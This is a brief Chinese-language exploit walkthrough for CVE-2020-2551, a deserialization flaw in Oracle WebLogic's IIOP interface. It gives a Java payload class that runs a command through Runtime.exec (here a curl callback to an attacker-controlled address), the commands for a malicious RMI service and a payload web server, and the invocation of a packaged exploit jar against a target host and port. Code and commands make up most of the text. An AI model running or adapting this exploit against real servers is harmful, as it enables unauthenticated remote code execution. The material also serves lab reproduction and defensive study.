CVE-2020-2551
Introduction: Weblogic IIOP CVE-2020-2551
Tags:
Weblogic IIOP 反序列化
测试环境
Weblogic10.3.6+jdk1.6
打包好的 jar 包 提取码:a6ob
漏洞利用
下载 jar 包,然后使用 marshalsec 起一个恶意的 RMI 服务,本地编译一个 exp.java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
尽量使用和 weblogic 相同的 jdk 版本和依赖库(wlfullclient.jar)编译 然后本地起一个 web 服务器
python -m http.server --bind 0.0.0.0 80
命令行运行 jar 包
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
实际效果如图

已知问题
很多小伙伴都说复现不成功,看了网上的一些文章发现 IIOP 存在 nat 模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。
